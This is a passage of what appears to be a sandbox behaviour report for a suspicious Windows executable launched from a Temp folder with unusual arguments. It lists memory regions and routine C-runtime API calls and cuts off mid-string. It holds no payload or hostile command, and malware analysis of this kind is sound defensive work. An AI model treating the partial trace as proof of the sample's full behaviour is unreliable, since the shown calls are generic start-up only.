"LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 341 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 342 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 343 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 344 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "cnuu8vyt.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe") Region: id = 345 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 346 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 347 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 348 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 349 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 350 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 351 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 352 start_va = 0x270000 end_va = 0x2d6fff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 353 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 354 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 355 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 356 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 357 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 358 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 359 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 360 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 361 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 362 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 363 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 364 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 365 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 366 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 367 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 368 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 369 start_va = 0x1210000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 452 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 453 start_va = 0x1210000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 454 start_va = 0x13c0000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 470 start_va = 0x1210000 end_va = 0x12eefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 471 start_va = 0x12f0000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 472 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 473 start_va = 0x150000 end_va = 0x152fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 474 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Thread: id = 5 os_tid = 0xac8 [0093.253] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x767e91a0, dwHighDateTime=0x1d440a9)) [0093.253] GetCurrentProcessId () returned 0xac4 [0093.254] GetCurrentThreadId () returned 0xac8 [0093.254] GetTickCount () returned 0x229cd [0093.254] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=15004284522) returned 1 [0093.254] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0093.254] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0093.255] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0093.255] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0093.255] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0093.255] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0093.255] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0093.256] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0093.256] GetCurrentThreadId () returned 0xac8 [0093.256] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x13c07d0)) [0093.256] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0093.256] GetFileType (hFile=0x3) returned 0x0 [0093.257] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0093.257] GetFileType (hFile=0x7) returned 0x0 [0093.257] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0093.257] GetFileType (hFile=0xb) returned 0x0 [0093.257] SetHandleCount (uNumber=0x20) returned 0x20 [0093.257] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.257] GetEnvironmentStringsW () returned 0x17fc80* [0093.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0093.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x13c11f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0093.257] FreeEnvironmentStringsW (penv=0x17fc80) returned 1 [0093.257] GetLastError () returned 0x6 [0093.257] SetLastError (dwErrCode=0x6) [0093.257] GetLastError () returned 0x6 [0093.257] SetLastError (dwErrCode=0x6) [0093.257] GetLastError () returned 0x6 [0093.257] SetLastError (dwErrCode=0x6) [0093.257] GetACP () returned 0x4e4 [0093.257] GetLastError () returned 0x6 [0093.257] SetLastError (dwErrCode=0x6) [0093.257] IsValidCodePage (CodePage=0x4e4) returned 1 [0093.257] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0093.257] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0093.257] GetLastError () returned 0x6 [0093.257] SetLastError (dwErrCode=0x6) [0093.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0093.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0093.258] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0093.258] GetLastError () returned 0x6 [0093.258] SetLastError (dwErrCode=0x6) [0093.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0093.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ횋খശAĀ") returned 256 [0093.258] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ횋খശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0093.258] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ횋খശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0093.258] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x49\xcb\xff\x08\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0093.258] GetLastError () returned 0x6 [0093.258] SetLastError (dwErrCode=0x6) [0093.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0093.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ횋খശAĀ") returned 256 [0093.258] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ횋খശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0093.258] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ횋খശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0093.258] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x